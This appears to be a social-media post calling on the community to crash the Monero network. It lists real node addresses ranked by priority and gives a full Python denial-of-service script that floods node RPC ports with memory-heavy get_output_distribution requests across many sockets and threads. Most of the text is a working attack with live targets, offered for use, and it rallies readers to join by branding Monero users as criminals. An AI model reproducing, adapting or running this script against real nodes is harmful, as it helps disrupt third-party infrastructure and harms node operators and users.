-
@ Tellick
2025-02-14 19:37:13
Zeronero
Monero is used by criminals around the globe to commit more and more crimes with total anonymity and impunity. From DDoS and ransomware to the resale of stolen credit cards and terrorism funding, Monero is the vehicle of choice for evil activities. The number of victims will never diminish if Monero isn't shut down.
Fortunately, Monero is vulnerable right now. The RPC do not set size limit on responses and this can cause Monero nodes to consume all their memory. They will fix this vulnerability very soon at its next release and needs to be exploited now by the entire community in order to succeed.
Our team is successfully taking down one seed node and 8 public nodes with no more than 2MB/s of bandwith. Nevertheless, some public nodes are distributing the load across a lot of other private nodes, and these require a subsequent number of socket to work. We need the help of everyone to take down the Monero network once and for all and remind these criminals that we're against their scam.
Help us bring a better future without Monero.
~WyRCV2 :3
Targets in priority order:
S (critical):
176.9.0.187.18089
88.198.163.90:18089
66.85.74.134:18089
51.79.173.165:18089
192.99.8.110:18089
37.187.74.171:18089
88.99.195.15:18089
xmr-node-eu.cakewallet.com:18081
xmr-node.cakewallet.com:18081
xmr-node-uk.cakewallet.com:18081
A:
node.sethforprivacy.com:18089
nodes.hashvault.pro:18081
p2pmd.xmrvsbeast.com:18081
node.monerodevs.org:18089
node2.monerodevs.org:18089
node3.monerodevs.org:18089
B:
xmr-full.p2pool.uk:18089
xmr-pruned.p2pool.uk:18089
p2pool.uk:18089
monero.stackwallet.com:18081
D:
xmr.support:18081
vern.cc:18081
nthpyro.dev:18089
Attack code (Python 3.13):
"""
ZERONERO DoS Exploit by WyRCV2 :3
Feel free to use this Python script to destroy any Monero node with its RPC port open.
This simply calls a very memory-exhaustive RPC request in a loop without asking the response. This will cause the node to crash.
"""
import asyncio
import threading
from math import ceil
import time
import argparse
import os
HTTP_REQUEST = "GET /json_rpc HTTP/1.1\r\n\
User-Agent: zeronero/1 (WyRCV2 for the W)\r\n\
Cookie: truth=exterminating the xmr cockroach\r\n\
Accept: */*\r\n\
Content-Type: application/json\r\n\
Content-Length: 61\r\n\
\r\n\
{\"method\":\"get_output_distribution\",\"params\":{\"amounts\":[0]}}"
stop_event = threading.Event()
refused_lock = threading.Lock()
REFUSED = 0
async def spam_request(socket_id, host, port, loop_sleep, n_sockets):
global REFUSED
while not stop_event.is_set():
try:
reader, writer = await asyncio.open_connection(host, port)
print(f"Socket {socket_id}: Connected to {host}:{port}. Requesting...")
while not stop_event.is_set():
writer.write(HTTP_REQUEST.encode('utf-8'))
await writer.drain()
print(f"Socket {socket_id}: Data sent successfully.")
await asyncio.sleep(loop_sleep)
print(f"Socket {socket_id}: Stop signal received, closing connection.")
writer.close()
await writer.wait_closed()
except Exception as ex:
if isinstance(ex, ConnectionRefusedError):
with refused_lock:
REFUSED += 1
current_refused = REFUSED
print(f"Socket {socket_id}: Connection refused. Global REFUSED count = {current_refused}")
if current_refused >= n_sockets:
print("All socket connections were refused. Attack was successful. Signaling stop.")
stop_event.set()
else:
print(f"Socket {socket_id}: Error occurred: {ex}")
def start_event_loop(coroutines, thread_id):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
try:
print(f"Thread {thread_id} starting with {len(coroutines)} coroutines.")
loop.run_until_complete(asyncio.gather(*coroutines))
finally:
loop.close()
print(f"Thread {thread_id} event loop closed.")
def parse_args():
parser = argparse.ArgumentParser(description="ZERONERO DoS Exploit by WyRCV2 :P")
parser.add_argument("--host", type=str, help="Target host")
parser.add_argument("--port", type=int, help="Target port")
parser.add_argument("--n_sockets", type=int, default=10, help="Total number of socket connections (default: 10)")
parser.add_argument("--n_threads", type=int, default=os.cpu_count(), help="Number of threads (default: number of CPU cores)")
parser.add_argument("--loop_sleep", type=float, default=0.10, help="Sleep time between write (seconds, default: 100 milliseconds)")
parser.add_argument("--run_duration", type=float, default=300.0, help="Total run duration before stopping coroutines (seconds, default: 300.0)")
return parser.parse_args()
def main():
print("ZERONERO DoS Exploit by WyRCV2 :P")
args = parse_args()
all_coroutines = [
spam_request(
socket_id=i,
host=args.host,
port=args.port,
loop_sleep=args.loop_sleep,
n_sockets=args.n_sockets,
) for i in range(1, args.n_sockets + 1)
]
coroutine_per_thread = ceil(len(all_coroutines) / args.n_threads)
threads = []
for thread_idx in range(args.n_threads):
start_index = thread_idx * coroutine_per_thread
end_index = start_index + coroutine_per_thread
coroutine_slice = all_coroutines[start_index:end_index]
if coroutine_slice:
thread = threading.Thread(target=start_event_loop, args=(coroutine_slice, thread_idx + 1))
threads.append(thread)
thread.start()
try:
time.sleep(args.run_duration)
except KeyboardInterrupt:
print("Stopping coroutines.")
finally:
stop_event.set()
for thread in threads:
thread.join()
if __name__ == "__main__":
main()